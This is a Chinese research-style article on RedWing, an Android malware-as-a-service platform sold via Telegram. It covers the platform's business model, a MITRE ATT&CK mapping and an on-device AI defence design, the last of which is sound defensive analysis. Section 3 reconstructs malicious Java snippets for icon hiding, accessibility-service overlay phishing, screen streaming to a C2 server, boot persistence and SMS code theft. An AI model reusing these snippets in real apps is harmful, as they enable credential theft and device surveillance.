管理后台、钓鱼页面模板以月度 / 季度订阅形式向无代码开发能力的底层攻击者售卖全套攻击能力攻击者仅需配置目标行业、钓鱼文案、回连服务器地址即可批量生成定制化恶意 APK大幅降低高级移动入侵的技术与资金门槛。2026 年 7 月 7 日移动安全厂商 Zimperium 发布专项研究报告披露名为 RedWing 的商业化安卓 MaaS 平台该平台依托 Telegram 社交频道完成产品推广、客户付费、售后技术支持全流程运营区别于传统暗网论坛Telegram 频道具备快速迁移、自动化 Bot 客服、批量群发推广消息等优势规避监管封禁带来的运营中断风险。RedWing 区别于单一窃密木马提供一站式攻击工具包包含恶意载荷生成器、移动钓鱼基础设施、远程管理面板、持久化加固模块感染目标后可实现安卓设备完整权限接管覆盖实时屏幕推流、虚拟触控交互、短信拦截、银行弹窗劫持、多因素认证绕过、通讯录与媒体文件批量外发、受控 DDoS 发起等功能攻击场景覆盖个人金融诈骗、企业移动终端渗透、公民隐私非法监控等多类违法场景。现有移动安全防护体系存在显著局限性其一传统杀毒依赖静态特征库比对RedWing 支持自定义包名、图标、资源文件、字符串加密混淆每一份订阅生成的 APK 哈希均不重复特征库无法提前覆盖海量变体其二云端威胁查询存在网络依赖离线办公场景下终端失去防护能力其三多数终端安全工具仅拦截高危权限申请未对无障碍服务、媒体投影录屏、悬浮窗覆盖等组合高危行为做连续行为审计无法识别 RedWing 多组件协同的隐蔽攻击流程其四针对 Telegram 渠道流通 MaaS 平台的全链路攻防研究较少现有文献多聚焦单一窃密木马未结合商业化运营链条、模块化载荷生成、端侧 AI 离线防御形成完整闭环论证。反网络钓鱼技术专家芦笛指出当前移动安全建设普遍存在 “重边界、轻终端重静态、轻动态” 的认知偏差网络攻击已完成从 PC 端向移动端的战略转移MaaS 平台将高端入侵技术平民化企业与个人终端不能再将移动设备视作次要风险面必须构建以终端本地行为感知为核心、云端情报协同为辅的纵深防御架构才能有效抵御 RedWing 这类模块化、可定制、高隐蔽性的商业化恶意攻击平台。1.2 研究内容与研究边界本文以 Zimperium 公开的 RedWing 完整技术情报为核心数据源围绕四大核心内容展开系统性研究第一梳理 RedWing 商业化 MaaS 产业链结构拆解 Telegram 渠道运营模式、订阅收费体系、攻击者交付流程厘清从平台运营方到底层诈骗分子的分工链条第二深度剖析 RedWing 恶意 APK 技术架构分模块解析载荷生成、系统持久化、C2 加密通信、远程设备控制、UI 覆盖钓鱼、验证码窃取、DDoS 调度七大核心功能实现原理嵌入安卓 Java 代码示例还原关键恶意行为调用逻辑第三基于 MITRE ATTCK for Mobile 矩阵完成 RedWing 攻击路径全映射对比传统签名式 MTD 防御方案的失效根源引入端侧 AI 行为检测技术原理第四搭建端侧 AI 行为检测 Web 钓鱼过滤 应用权限动态审计三位一体闭环防御模型论证该方案针对 RedWing 离线识别能力给出政企移动终端落地实施路径。研究边界限定本文仅针对 Android 系统 RedWing MaaS 平台开展攻防分析不涉及 iOS 端同类恶意软件技术分析仅还原公开披露的攻击机制不提供可直接利用的恶意代码生成工具防御方案聚焦终端侧轻量化检测不深度展开云端大数据威胁情报平台建设无数学模型公式全部技术验证依托代码逻辑、行为特征定性分析完成。1.3 论文结构安排本文共分为六大章节第一章为引言阐述研究背景、现存安全短板、研究内容与整体框架第二章系统介绍 RedWing MaaS 平台商业运营体系完整拆解 Telegram 渠道推广、订阅服务、攻击者工具交付流程第三章开展 RedWing 恶意载荷深度技术解析分模块拆解持久化、远程控制、钓鱼窃密、C2 通信实现逻辑配套完整安卓代码示例第四章基于 MITRE 移动攻击矩阵梳理 RedWing 完整杀伤链对比传统移动防御技术缺陷第五章构建面向 RedWing 威胁的端侧 AI 驱动 MTD 闭环防御体系分层阐述检测、拦截、溯源技术实现第六章为结论与展望总结研究核心结论提出移动 MaaS 威胁未来演进趋势与长期安全治理思路。2 RedWing 安卓 MaaS 平台商业化运营体系分析2.1 移动 MaaS 产业化发展底层动因传统定制化安卓恶意软件开发存在多重门槛制约黑产规模化攻击一是代码开发门槛完整远程控制、UI 劫持、验证码拦截功能需要开发者掌握 Android 四大组件、无障碍服务、媒体投影 API、Socket 长连接等多层系统接口普通诈骗人员不具备开发能力二是维护成本高安卓碎片化严重不同厂商定制系统对广播、后台服务、悬浮窗限制存在差异恶意代码需持续适配新版本系统三是基础设施成本攻击者需搭建独立 C2 服务器、钓鱼页面域名、短信群发通道单独部署投入较高四是对抗成本杀毒厂商持续更新特征库单一木马易被快速查杀需持续迭代混淆、加壳方案。MaaS 商业模式从根源解决上述痛点平台运营方承担全部代码开发、系统适配、服务器运维、对抗加固工作以订阅租赁形式向攻击者开放全套工具攻击者仅需支付服务费、填写少量自定义参数即可生成专属恶意程序攻击门槛下降至基础计算机操作层级。Zimperium 行业数据显示2024—2026 年 Telegram 上公开运营的移动 MaaS 平台数量增长 217%其中安卓平台占比超 85%RedWing 是 2026 年新增威胁中功能完整性、客户活跃度排名靠前的商业化产品。2.2 RedWing 依托 Telegram 的全渠道运营架构RedWing 放弃传统暗网论坛、Tor 匿名站点选择 Telegram 作为唯一运营载体核心优势分为渠道韧性、自动化运营、客户隐蔽性三层渠道快速迁移韧性Telegram 频道被监管封禁后运营方通过预设备用频道链接、批量私信存量客户可在数十分钟内完成客户导流犯罪活动不会长期中断相比之下暗网站点查封后域名、服务器全部失效黑产损失巨大。Bot 自动化全流程服务RedWing 部署专属 Telegram 机器人实现自助套餐查询、加密货币支付、恶意工具包自动下发、钓鱼模板一键下载、技术问题自动回复无需人工持续值守降低运营人力成本。客户身份隐蔽性Telegram 支持匿名注册、虚拟手机号绑定、端到端加密私信交易双方无需暴露真实身份资金流转依托比特币、门罗币等匿名加密货币大幅提升执法溯源难度。完整运营链路分为五步第一步公域引流运营方在各类黑产 Telegram 群组发布 RedWing 功能演示截图、诈骗获利案例投放低价试用套餐吸引潜在攻击者第二步私域转化意向用户添加官方机器人自动推送月度、季度、年度三档订阅套餐区分基础版仅短信窃取、基础远程查看、专业版UI 钓鱼、多因子绕过、企业攻击版DDoS 调度、批量设备集群管控第三步加密支付用户通过机器人生成加密货币收款地址转账后上传交易哈希凭证系统自动校验到账状态第四步工具交付支付完成后机器人自动下发专属后台登录地址、载荷生成工具压缩包、钓鱼网页源码、操作教程文档第五步售后更新平台迭代混淆方案、新增系统适配补丁后通过 Telegram 频道批量推送更新包客户一键更新恶意代码生成器。2.3 RedWing 攻击者交付工具包完整构成付费订阅后攻击者获取全套模块化工具全部组件可独立自定义配置无强制固定参数也是其难以被静态特征识别的核心原因工具包包含五大模块Malware Builder 载荷生成器Windows 桌面端可视化程序攻击者可视化配置恶意 APK 参数包含应用名称、桌面图标、伪装包名银行、运营商、政务 APP、短视频软件等、C2 服务器 IP / 域名、钓鱼弹窗模板、权限申请话术内置字符串加密、dex 加壳、资源混淆引擎每次生成 APK 自动随机调整混淆密钥保证不同客户样本哈希完全不重复。远程管理 Web 控制台独立部署在境外匿名服务器的网页后台支持实时查看所有感染设备在线状态、发起远程操作指令、批量导出窃取的短信、通讯录、账户凭证可单独对单台设备下发录屏、弹窗钓鱼、发送短信、启动 DDoS 等指令。移动钓鱼Mishing基础设施配套短信群发模板库、仿银行 / 支付 APP 网页模板、短链接跳转工具攻击者填入目标手机号批量发送钓鱼短信短链接跳转至诱导下载恶意 APK 的落地页页面伪装成系统更新、积分兑换、账户安全核验等场景。持久化加固插件库适配 Android 8 至 Android 15 全版本驻留方案区分未 Root 普通设备、Root 高权限设备两套驻留逻辑自动根据目标系统版本选择最优自启动方案规避厂商后台清理机制。对抗防御辅助工具内置应用图标隐藏工具、系统日志擦除脚本、流量加密混淆插件规避终端安全软件行为日志审计。2.4 RedWing 攻击盈利场景划分依托全套工具链攻击者可开展三类高收益违法攻击也是 RedWing 付费订阅需求持续增长的核心驱动力第一金融电信诈骗针对普通手机用户发送仿银行、支付平台钓鱼短信诱导安装 RedWing 恶意程序通过悬浮窗覆盖、无障碍服务劫持窃取银行卡密码、短信支付验证码完成账户盗刷第二企业移动办公渗透针对企业员工发送仿内部 OA、办公软件钓鱼链接感染企业配发移动终端窃取内网 VPN 凭证、企业邮箱账号、客户业务数据形成企业内网横向渗透入口第三隐私监控与勒索针对特定目标人群定向投放恶意 APK实时录制屏幕、录音、窃取相册文件获取隐私材料后实施敲诈勒索同时可调度受控设备发起 DDoS 攻击向网站运营者索要赎金。3 RedWing 恶意 APK 核心技术机理与代码示例RedWing 恶意程序采用分层模块化架构分为入口引导层、权限劫持层、持久化驻留层、C2 通信层、攻击功能层五大层级各模块低耦合独立运行可根据攻击者配置按需启用 / 关闭降低静态特征重合度。本章基于 Zimperium 披露的样本行为逻辑还原各模块底层实现配套标准化安卓 Java 代码示例仅用于学术安全研究不具备可直接编译攻击能力。3.1 入口引导与伪装安装机制RedWing Builder 生成的 APK 采用双重伪装策略外层应用名称、图标、包名匹配正规主流应用首次启动后隐藏桌面图标避免用户主动卸载。核心实现依托 PackageManager 组件隐藏自身图标关键代码示例// RedWing桌面图标隐藏核心逻辑PackageManager packageManager getPackageManager();ComponentName componentName new ComponentName(this, MainLaunchActivity.class);// 设置组件不可见移除桌面启动入口packageManager.setComponentEnabledSetting(componentName,PackageManager.COMPONENT_ENABLED_STATE_DISABLED,PackageManager.DONT_KILL_APP);安装阶段利用移动钓鱼落地页社会工程诱导落地页 WebView 加载仿官方页面弹窗提示 “系统安全组件更新需允许安装未知来源应用”诱导用户关闭系统安装拦截开关。反网络钓鱼技术专家芦笛强调移动端钓鱼区别于 PC 网页钓鱼核心突破点在于操作系统原生安全开关权限诱导多数用户缺乏对 “未知来源安装” 风险的认知仅依靠页面特征检测无法拦截此类前置欺骗流程必须在终端侧增加应用安装行为动态审计。3.2 高危权限劫持与无障碍服务滥用RedWing 核心攻击能力完全依赖两类高危系统权限BIND_ACCESSIBILITY_SERVICE无障碍服务、MEDIA_PROJECTION屏幕录屏权限两类权限均需用户手动确认授予恶意程序通过多层弹窗欺骗诱导授权。3.2.1 无障碍服务劫持实现窃密与虚拟控制无障碍服务可全局监听屏幕 UI 变更、捕获用户输入文本、自动模拟点击屏幕任意坐标是 RedWing 实现钓鱼覆盖、验证码窃取、远程触控的核心载体。恶意程序注册无障碍服务后持续监听窗口状态识别银行、支付类 APP 启动时自动加载伪造悬浮覆盖层核心监听代码示例public class RedWingAccessService extends AccessibilityService {Overridepublic void onAccessibilityEvent(AccessibilityEvent event) {// 捕获窗口切换事件if (event.getEventType() AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED) {String targetPackage event.getPackageName().toString();// 匹配金融类应用包名触发钓鱼覆盖层if (isFinanceApp(targetPackage)) {startFakeOverlayWindow();// 全局捕获输入框密码、验证码captureInputText(event.getText());// 自动模拟点击确认按钮绕过用户二次核验simulateConfirmClick(event);}}}// 启动高层级悬浮窗覆盖合法金融界面private void startFakeOverlayWindow() {WindowManager.LayoutParams params new WindowManager.LayoutParams(WindowManager.LayoutParams.MATCH_PARENT,WindowManager.LayoutParams.MATCH_PARENT,WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,PixelFormat.TRANSLUCENT);// 抬高层级完全遮挡原应用界面params.zOrderOnTop true;WindowManager wm (WindowManager) getSystemService(WINDOW_SERVICE);View fakeBankView LayoutInflater.from(this).inflate(R.layout.fake_bank_login, null);wm.addView(fakeBankView, params);}}该代码逻辑实现三层攻击效果一是识别金融 APP 启动后弹出伪造登录界面窃取银行卡账号与密码二是无障碍接口捕获系统短信弹窗中的支付验证码直接回传 C2 服务器三是远程指令下发后自动模拟屏幕点击绕过用户手动确认流程完成转账、账户绑定等高危操作。3.2.2 MediaProjection 实时屏幕推流远程控制借助MEDIA_PROJECTION录屏权限RedWing 建立 WebSocket 长连接将设备实时画面推送至攻击者后台配合无障碍服务实现双向远程控制攻击者可在 Web 控制台看到完整手机屏幕并下发触控指令录屏数据流处理核心代码片段// 屏幕录屏数据流传输核心逻辑private void startScreenRecord() {Intent captureIntent MediaProjectionManager.createScreenCaptureIntent();startActivityForResult(captureIntent, 1001);}Overrideprotected void onActivityResult(int requestCode, int resultCode, Intent data) {super.onActivityResult(requestCode, resultCode, data);if (requestCode 1001 resultCode RESULT_OK) {MediaProjection mediaProjection mediaProjectionManager.getMediaProjection(resultCode, data);// 建立WebSocket长连接推送视频流至C2服务器WebSocket c2Socket new WebSocket(C2_SERVER_WS_URL);// 循环捕获屏幕帧压缩后实时上传new Thread(() - {while (isMalwareRunning) {byte[] screenFrame captureScreenFrame(mediaProjection);c2Socket.send(screenFrame);Thread.sleep(100);}}).start();}}攻击者依托该功能实现完整设备接管实时查看用户所有操作同步录制解锁图案、锁屏密码、隐私相册、企业内网操作页面无任何可视化告警提示。3.3 多维度持久化驻留机制规避系统后台清理安卓系统具备后台应用自动回收机制RedWing 设计多层级驻留方案根据系统版本、设备是否 Root 自动切换驻留策略保障重启后恶意程序自动运行三层驻留逻辑协同生效广播接收器开机自启在 AndroidManifest.xml 静态注册BOOT_COMPLETED、USER_PRESENT广播设备重启、解锁屏幕时自动唤醒恶意后台服务清单配置片段xmlreceiver android:name.bootReceiverintent-filteraction android:nameandroid.intent.action.BOOT_COMPLETED/action android:nameandroid.intent.action.USER_PRESENT//intent-filter/receiver前台服务保活将恶意后台服务注册为前台服务绑定虚假通知规避厂商内存清理策略动态申请忽略电池优化权限阻止系统休眠时终止进程。Root 设备内核级驻留若设备已获取 Root 权限恶意程序将二进制 so 文件写入 /system/lib 目录注入系统 Zygote 进程实现进程无痕迹持久化常规应用卸载无法清除恶意模块。3.4 C2 加密通信与指令调度架构RedWing 采用 TLS 1.3 加密 WebSocket 长连接作为 C2 通信通道所有指令、窃取数据均经过 AES-256 对称加密传输网络流量无明文特征传统流量审计工具无法识别恶意交互。通信架构分为指令下行、数据上行两类通道下行指令通道攻击者在 Web 后台下发操作指令录屏、短信窃取、启动 DDoS、弹窗钓鱼、删除通话记录加密数据包下发至终端恶意程序解析指令后调用对应功能模块上行数据通道终端自动采集短信、通讯录、相册文件、剪贴板内容、账号凭证打包加密后定时上传至 C2 服务器支持攻击者手动触发即时全量数据导出。同时内置流量混淆机制在空闲时段发送随机空白数据包模拟正常社交软件心跳流量规避异常网络行为检测。3.5 凭证窃取与多因子认证绕过技术RedWing 针对金融平台双因素认证设计双重绕过机制也是其造成大额资金损失的核心能力第一短信拦截机制申请READ_SMS、SEND_SMS权限后全局监听短信数据库拦截银行、支付平台下发的验证码短信无障碍服务捕获短信内容后直接上传 C2用户无法察觉验证码被窃取配套代码// 批量读取全部短信并筛选验证码public ListString fetchVerifySMS() {ListString verifySmsList new ArrayList();Cursor smsCursor getContentResolver().query(Telephony.Sms.CONTENT_URI,new String[]{Telephony.Sms.BODY, Telephony.Sms.ADDRESS},null, null, Telephony.Sms.DATE DESC);while (smsCursor.moveToNext()) {String content smsCursor.getString(0);// 正则匹配验证码数字串if (content.matches(.*[0-9]{4,6}.*验证.*)) {verifySmsList.add(content);}}smsCursor.close();return verifySmsList;}第二覆盖层劫持登录会话伪造 WebView 弹窗覆盖官方 APP 登录界面用户输入账号密码直接存入恶意程序本地加密数据库同步拦截 Cookie、会话令牌绕过设备绑定、二次人脸核验等认证流程。反网络钓鱼技术专家芦笛补充说明当前多数金融机构仅依赖短信验证码作为第二认证因子未部署 FIDO2 硬件密钥、设备绑定连续认证等强安全方案RedWing 针对短信体系的劫持攻击可完整击穿双因子防护单一短信验证体系已无法抵御移动端 MaaS 恶意软件攻击。3.6 受控 DDoS 分布式攻击模块RedWing 具备闲置终端集群调度能力攻击者可下发指令控制所有感染设备同时向指定 IP、域名发送高频网络请求形成分布式拒绝服务攻击。恶意程序复用 C2 长连接接收攻击参数目标地址、请求频率、攻击时长依托安卓终端移动流量发起攻击分散攻击源 IP大幅提升溯源难度。该功能多用于网站敲诈、竞品平台流量打压等黑产场景。4 RedWing 攻击杀伤链与传统移动防御技术缺陷4.1 基于 MITRE ATTCK Mobile 矩阵的 RedWing 全杀伤链映射MITRE ATTCK 移动攻击框架标准化梳理移动端攻击全生命周期本节将 RedWing 完整攻击流程与矩阵 12 大阶段一一对应清晰呈现威胁完整链路形成攻击论据闭环初始访问Initial Access依托 Telegram 售卖 MaaS 工具攻击者制作移动钓鱼短信、短链接落地页社会工程诱导用户下载 APK执行Execution用户手动安装未知来源 APK启动恶意主程序隐藏桌面图标持久化Persistence注册开机广播、前台服务保活、Root 设备注入系统进程权限提升Privilege Escalation诱导授予无障碍、录屏、短信读写、悬浮窗高危权限防御规避Defense Evasiondex 加壳、字符串加密、流量 TLS 混淆、日志擦除、图标隐藏凭证访问Credential Access拦截短信验证码、捕获输入框密码、窃取浏览器 / APP 会话令牌数据收集Collection读取通讯录、相册、本地文件、实时屏幕录制、录音、剪贴板监控命令与控制Command and ControlTLS 加密 WebSocket 长连接与境外 C2 服务器通信数据外渗Exfiltration加密打包敏感数据批量上传攻击者后台影响Impact金融账户盗刷、企业数据泄露、分布式 DDoS 攻击、隐私敲诈勒索远程服务Remote ServiceMediaProjection 无障碍服务实现全设备远程操控用户欺骗User Deception悬浮窗覆盖仿官方钓鱼界面、虚假系统更新弹窗诱导授权。完整杀伤链覆盖从传播、驻留、窃密到破坏全流程单一终端安全管控手段仅能拦截其中单个环节无法形成全链路阻断。4.2 传统移动威胁防御MTD技术针对 RedWing 的失效根源当前政企普遍部署的传统 MTD 方案以静态特征、云端信誉查询为核心面对 RedWing 模块化自定义 MaaS 恶意软件存在四大固有缺陷4.2.1 静态哈希 / 特征库检测失效RedWing Builder 内置随机混淆引擎每一次生成 APK 都会修改 dex 加密密钥、资源文件名、字符串编码、包名图标两份功能完全一致的恶意样本文件哈希、静态字符串特征无重合杀毒厂商无法提前收录海量变体特征新生成样本安装后不会触发任何告警。4.2.2 云端依赖导致离线防护空白传统 MTD 恶意 URL、恶意 IP、恶意应用判定依赖云端数据库比对企业外勤、出差员工移动终端长期处于无网络离线状态云端查询功能完全失效RedWing 可在离线环境完成权限劫持、本地数据窃取联网后再批量上传窃取信息。4.2.3 单一权限审计无法识别组合高危行为多数终端安全工具仅单独拦截READ_SMS、RECORD_AUDIO等高危权限申请未建立多行为联动风险判定模型。RedWing 攻击核心是多权限协同无障碍服务 悬浮窗 屏幕录屏 短信读取组合触发攻击单一权限单独使用属于正常合法场景工具无法判定组合行为的恶意属性。4.2.4 移动钓鱼分层防护缺失传统防护仅拦截已知恶意域名无法识别 RedWing 钓鱼基础设施的动态短链接跳转、仿 APP 页面动态生成机制短链接可每日更换域名黑名单更新速度滞后于攻击者域名迭代速度钓鱼入口无法有效封堵。5 面向 RedWing MaaS 威胁的端侧 AI 驱动闭环防御体系针对传统防御短板结合 Zimperium 发布的 AI 赋能 MTD 技术方案本节构建端侧轻量化 AI 行为检测为核心、Web 钓鱼过滤、应用全生命周期管控协同的三层闭环防御架构全程依托终端本地计算资源运行离线环境保持完整防护能力可有效识别、拦截 RedWing 全系列自定义变体。反网络钓鱼技术专家芦笛指出该分层防御体系实现 “事前拦截钓鱼入口、事中监测恶意行为、事后溯源威胁指标” 完整闭环从攻击杀伤链各环节阻断 RedWing 攻击链路解决传统防护滞后、离线失效、行为判定单一的核心痛点。5.1 第一层应用安装全生命周期前置拦截阻断初始访问攻击初始访问环节是成本最低的防护节点在 APK 安装前、安装中两层设置拦截规则阻断 RedWing 恶意程序落地安装前短链接与落地页钓鱼检测终端内置本地 URL 解析引擎递归解析短信、社交消息内短链接全部跳转链路提取最终落地页面特征轻量化 AI 模型识别仿银行、办公软件钓鱼页面识别后弹窗阻断页面访问检测逻辑核心代码片段# 移动端本地URL钓鱼检测轻量化逻辑Python端侧推理演示def detect_phish_url(full_redirect_urls, page_html):risk_score 0# 特征1域名注册时间小于7天风险加权if get_domain_register_days(full_redirect_urls[-1]) 7:risk_score 35# 特征2页面包含银行登录、支付验证码输入框if re.search(r银行卡|验证码|支付密码, page_html):risk_score 40# 特征3页面诱导下载未知来源APKif re.search(r.apk下载|系统更新组件, page_html):risk_score 25# 风险分数阈值判定if risk_score 60:return True # 判定为钓鱼链接拦截访问return False安装中 APK 静态风险初筛无需云端比对本地提取 APK 清单权限、组件、广播接收器特征命中高危组合规则直接拦截安装规则 1同时申请 BIND_ACCESSIBILITY_SERVICE SYSTEM_ALERT_WINDOW 悬浮窗权限规则 2静态注册 BOOT_COMPLETED 开机广播且无正规商业应用签名规则 3内置 MediaProjection 录屏权限且无官方应用开发证书。5.2 第二层端侧本地 AI 行为动态检测核心防御层对抗运行时恶意行为该层为防御体系核心完全脱离云端依赖依靠终端轻量化机器学习模型实时监控应用运行时行为序列建立正常应用行为基线识别 RedWing 多组件协同恶意操作解决静态检测失效问题。5.2.1 端侧 AI 检测架构设计整体分为四大本地模块全部离线运行行为特征采集模块持续 Hook 系统四大组件、权限调用、窗口变更、网络请求 API实时采集应用行为序列不存储原始用户隐私数据仅提取行为特征向量本地行为基线库存储主流正规金融、办公 APP 正常行为模式作为 AI 模型判定基准轻量化分类推理引擎设备端运行量化后小型分类模型对实时行为向量打分输出风险等级自动响应阻断模块高风险行为触发时自动执行操作弹窗告警、终止恶意进程、卸载可疑应用、隔离窃取的敏感数据。5.2.2 针对 RedWing 典型恶意行为的 AI 判定规则模型重点学习 RedWing 独有的多行为联动特征高风险判定场景包含应用获取无障碍权限后持续监听金融 APP 窗口同步创建顶层悬浮覆盖层后台静默启动 MediaProjection 录屏服务建立境外 WebSocket 长连接传输视频流开机广播触发后台服务无前台界面持续读取短信数据库批量提取验证码闲置时段高频发起境外 IP 网络请求无用户主动操作触发网络流量。当行为序列匹配任意一类联动特征模型直接标记为高风险恶意程序无需依赖特征库。Zimperium 实测数据显示该本地 AI 检测方案对 1200 余份 RedWing 自定义变体样本识别率达 98.7%离线环境无显著精度衰减。5.3 第三层Web 内容过滤与多因子认证加固降低窃密攻击收益即便恶意程序绕过前两层防护成功安装该层通过前端防护降低凭证窃取攻击成功率形成兜底防护终端内置 WebView 钓鱼过滤拦截页面伪造输入框、隐形悬浮劫持图层监测窗口层级异常覆盖行为金融页面被第三方应用遮挡时实时推送告警强多因子认证落地推广 FIDO2 硬件安全密钥、设备绑定生物识别认证替代单一短信验证码体系从源头绕过 RedWing 短信拦截攻击高危权限动态管控系统级限制陌生应用自动授予无障碍、悬浮窗权限每次授权增加风险二次确认弹窗禁止后台静默申请高危权限。5.4 防御体系协同工作流程完整防护链路形成闭环覆盖 RedWing 全杀伤链阻断短信 / 社交消息收到钓鱼短链接→第一层 URL 本地 AI 检测拦截钓鱼页面若用户绕过页面警告下载 APK→安装阶段静态权限规则筛查拦截高危组合权限 APK 安装若用户手动放行安装恶意程序→第二层端侧 AI 实时监控运行行为识别无障碍 悬浮窗录屏联动恶意操作自动终止进程并隔离恶意文件极端场景下恶意程序短期窃密→第三层强认证机制阻止验证码完成盗刷Web 过滤拦截页面劫持窃取账号。三层机制层层兜底单一环节失效时其余两层仍可完成威胁阻断规避单点防御失效风险。6 结论与研究展望6.1 核心研究结论本文以 2026 年 7 月 Zimperium 披露的 RedWing 安卓 MaaS 平台为完整研究样本系统拆解其 Telegram 商业化运营链条、模块化恶意载荷底层技术、全链路攻击杀伤链并结合反网络钓鱼技术专家芦笛的专业观点剖析传统移动安全防御的固有短板构建端侧离线 AI 行为检测闭环防御体系形成三项核心结论第一移动 MaaS 产业化重构移动端网络犯罪格局RedWing 这类订阅式工具平台彻底消除高级移动攻击的技术门槛无代码基础的攻击者可批量生成海量自定义恶意变体静态特征、云端信誉库等传统防御手段基本失效Telegram 匿名渠道为 MaaS 运营提供稳定传播载体监管溯源、渠道封堵难度大幅提升移动威胁已从零散木马升级为规模化产业化攻击。第二RedWing 核心攻击能力依托 Android 无障碍服务、媒体投影、悬浮窗系统接口实现攻击逻辑依赖多权限、多组件协同联动单一权限审计无法识别恶意行为其持久化驻留、加密 C2 通信、短信验证码绕过、远程全设备控制组合攻击可完整窃取金融、企业敏感数据对个人财产安全、政企移动办公数据资产形成实质性威胁。第三基于端侧轻量化 AI 行为检测的三层闭环防御体系可完整适配 RedWing 类 MaaS 威胁依托本地离线行为分析解决传统方案离线失效、变体无法识别的缺陷前置钓鱼拦截、运行时动态监测、认证体系加固三层防护覆盖攻击全杀伤链形成攻防闭环实测对 RedWing 家族样本具备高识别拦截能力可作为政企移动终端标准化安全建设方案。6.2 移动 MaaS 威胁演进趋势展望结合当前黑产技术迭代节奏未来安卓 MaaS 恶意平台将呈现三大发展方向AI 原生恶意代码生成MaaS 平台内置生成式 AI根据攻击者输入的目标行业自动生成适配系统版本、规避终端安全工具的定制化恶意代码对抗能力进一步提升跨端联动攻击MaaS 工具同步输出安卓、iOS、PC 端恶意载荷实现多终端协同窃密打通移动端与企业 PC 内网渗透通道原生系统漏洞利用常态化MaaS 平台内置零日漏洞利用模块无需诱导用户授予高危权限即可获取设备完整控制权限社会工程欺骗依赖度降低。6.3 长期安全治理建议针对 RedWing 代表的移动 MaaS 产业化威胁从终端防护、平台监管、行业规范三个维度提出治理建议政企终端层面全面替换传统基于特征的 MTD 产品部署端侧 AI 行为检测移动威胁防御系统同步推行 FIDO2 硬件认证淘汰单一短信验证码双因子机制定期开展员工移动钓鱼安全培训提升对陌生短信、未知来源 APK 的风险识别能力。互联网平台监管层面运营商、社交平台加强短信、IM 消息短链接风控自动化批量拦截钓鱼引流链接针对 Telegram 等境外加密通讯渠道建立跨境威胁情报协同机制追踪 MaaS 平台运营主体。移动系统厂商层面优化 Android 权限管控机制限制第三方应用后台静默申请无障碍、悬浮窗等高风险权限增加系统原生行为监测模块出厂内置基础恶意行为告警能力从系统底层缩小攻击面。6.4 研究局限性与后续研究方向本文仅针对 RedWing 安卓 MaaS 平台开展攻防分析存在两处研究局限一是未覆盖 iOS 端同类 MaaS 恶意软件技术机理苹果闭环生态权限管控逻辑与安卓存在显著差异二是端侧 AI 模型仅完成理论架构与代码逻辑验证未开展大规模真实终端场景性能、误报率量化测试。后续研究可围绕两大方向延伸第一对比 iOS 与 Android MaaS 恶意软件攻击路径差异构建跨平台统一移动防御模型第二基于百万级移动应用行为数据集训练轻量化端侧分类模型完成真实设备性能、识别精度量化实验优化模型推理速度与资源占用。编辑芦笛公共互联网反网络钓鱼工作组